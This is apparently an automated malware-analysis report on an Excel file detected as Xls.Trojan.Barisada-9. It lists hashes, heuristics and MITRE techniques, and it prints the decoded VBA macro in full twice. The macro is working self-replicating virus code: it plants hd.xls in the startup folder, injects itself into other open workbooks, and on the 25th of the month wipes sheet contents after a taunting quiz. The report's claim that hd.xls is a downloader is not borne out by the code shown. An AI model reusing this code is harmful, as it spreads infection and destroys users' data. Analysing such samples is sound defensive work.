Office (OLE) malware analysis — malicious · ca84fb9ed93c2451

MALICIOUS

Office (OLE)

31.5 KB Created: 2000-12-20 08:21:33 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: fa679be3ec1161c85bb1a3d7c284b364 SHA-1: 62d00dbed3366de5255bd14e0d4a37d68539bc83 SHA-256: ca84fb9ed93c2451aa00175ab1612f0ff852e32f15d08a32ed1083ca670528fc

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV detection and medium heuristic for VBA macros indicate malicious intent. The VBA script attempts to create a file named 'hd.xls' in the startup path, which is likely a downloader for a second-stage payload. The script also contains logic for displaying messages and potentially executing further actions based on user interaction and the current day, suggesting a multi-stage attack.

Heuristics 2

ClamAV: Xls.Trojan.Barisada-9 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Barisada-9
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8882 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8882 bytes
SHA-256: `08ebe7689430e68e3f25fd28b3038653c73ab4b98a3c5abd133f2aef482bb0dc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window) Flag = False myfile = Dir(Application.StartupPath & "\hd.xls") If myfile <> "hd.xls" Then Application.ScreenUpdating = False Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\hd.xls", FileFormat:=xlNormal, addtomru:=False End If For i = 1 To Workbooks.Count eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines If eline <> 0 Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline) For j = 1 To Workbooks(i).VBProject.VBComponents.Count vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode) Next j: Next i If myfile <> "hd.xls" Then Workbooks("hd.xls").Close savechanges:=True dday = Day(Now) If dday = 25 Then Flag = True If Flag = True Then v1 = MsgBox("Question : Hyundai Unicorns left from Incheon, What do you think of it? " & vbCr & _ "Answer : Hyundai is SOB ", vbYesNo, "1st Qusetion") If v1 = vbYes Then MsgBox "Good! You're pretty good guy!!", vbOKOnly, "Excellent!" If v1 = vbNo Then MsgBox "Oh! no, Next question is last time for you", vbOKOnly + vbCritical, "Wrong Answer" v2 = MsgBox("We do not buy Hyundai's product, is it right?", vbYesNo, "If you have wrong answer, you will have punishment.") If v2 = vbYes Then MsgBox "You got it!", vbOKOnly, "You have right answer" If v2 = vbNo Then MsgBox "Wrong Answer, Your file will be deleted!", vbOKOnly + vbCritical, "You are SOB, too." For i = 1 To Workbooks.Count For j = 1 To Workbooks(i).Sheets.Count Workbooks(i).Sheets(i).Cells.Select Selection.Clear Next j: Next i: End If End If End If End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window) Flag = False myfile = Dir(Application.StartupPath & "\hd.xls") If myfile <> "hd.xls" Then Application.ScreenUpdating = False Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\hd.xls", FileFormat:=xlNormal, addtomru:=False End If For i = 1 To Workbooks.Count eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines If eline <> 0 Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline) For j = 1 To Workbooks(i).VBProject.VBComponents.Count vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode) Next j: Next i If myfile <> "hd.xls" Then Workbooks("hd.xls").Close savechanges:=True dday = Day(Now) If dday = 25 Then Flag = True If Flag = True Then v1 = MsgBox("Question : Hyundai Unicorns left from Incheon, What do you think of it? " & vbCr & _ "Answer : Hyundai is SOB ", vbYesNo, "1st Qusetion") If v1 = vbYes Then MsgBox "Good! You're pretty good guy!!", vbOKOnly, "Excellent!" If v1 = vbNo Then MsgBox "Oh! no, Next question is last time for you", vbOKOnly + vbCritical, "Wrong Answer" v2 = MsgBox("We do not buy Hyundai's product, is it right?", vbYesNo, "If you have wrong answer, you will have punishment.") If v2 = vbYes Then MsgBox "You got it!", vbOKOnly, "You have right answer" If v2 = vbNo Then MsgBox "Wrong An ... (truncated)

SHA-256: 08ebe7689430e68e3f25fd28b3038653c73ab4b98a3c5abd133f2aef482bb0dc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

Flag = False
 
 myfile = Dir(Application.StartupPath & "\hd.xls")
 If myfile <> "hd.xls" Then
   Application.ScreenUpdating = False
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\hd.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 

For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  If eline <> 0 Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
  
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
 If myfile <> "hd.xls" Then Workbooks("hd.xls").Close savechanges:=True
 


dday = Day(Now)

If dday = 25 Then Flag = True

If Flag = True Then
  v1 = MsgBox("Question : Hyundai Unicorns left from Incheon, What do you think of it? " & vbCr & _
  "Answer : Hyundai is SOB ", vbYesNo, "1st Qusetion")
  
  If v1 = vbYes Then MsgBox "Good! You're pretty good guy!!", vbOKOnly, "Excellent!"
  If v1 = vbNo Then
     MsgBox "Oh! no, Next question is last time for you", vbOKOnly + vbCritical, "Wrong Answer"
     v2 = MsgBox("We do not buy Hyundai's product, is it right?", vbYesNo, "If you have wrong answer, you will have punishment.")
     If v2 = vbYes Then MsgBox "You got it!", vbOKOnly, "You have right answer"
     If v2 = vbNo Then
       MsgBox "Wrong Answer, Your file will be deleted!", vbOKOnly + vbCritical, "You are SOB, too."
       For i = 1 To Workbooks.Count
        For j = 1 To Workbooks(i).Sheets.Count
          Workbooks(i).Sheets(i).Cells.Select
          Selection.Clear
       Next j: Next i:
     End If
     
     
  End If
 End If


End Sub














Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

Flag = False
 
 myfile = Dir(Application.StartupPath & "\hd.xls")
 If myfile <> "hd.xls" Then
   Application.ScreenUpdating = False
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\hd.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 

For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  If eline <> 0 Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
  
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
 If myfile <> "hd.xls" Then Workbooks("hd.xls").Close savechanges:=True
 


dday = Day(Now)

If dday = 25 Then Flag = True

If Flag = True Then
  v1 = MsgBox("Question : Hyundai Unicorns left from Incheon, What do you think of it? " & vbCr & _
  "Answer : Hyundai is SOB ", vbYesNo, "1st Qusetion")
  
  If v1 = vbYes Then MsgBox "Good! You're pretty good guy!!", vbOKOnly, "Excellent!"
  If v1 = vbNo Then
     MsgBox "Oh! no, Next question is last time for you", vbOKOnly + vbCritical, "Wrong Answer"
     v2 = MsgBox("We do not buy Hyundai's product, is it right?", vbYesNo, "If you have wrong answer, you will have punishment.")
     If v2 = vbYes Then MsgBox "You got it!", vbOKOnly, "You have right answer"
     If v2 = vbNo Then
       MsgBox "Wrong An
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.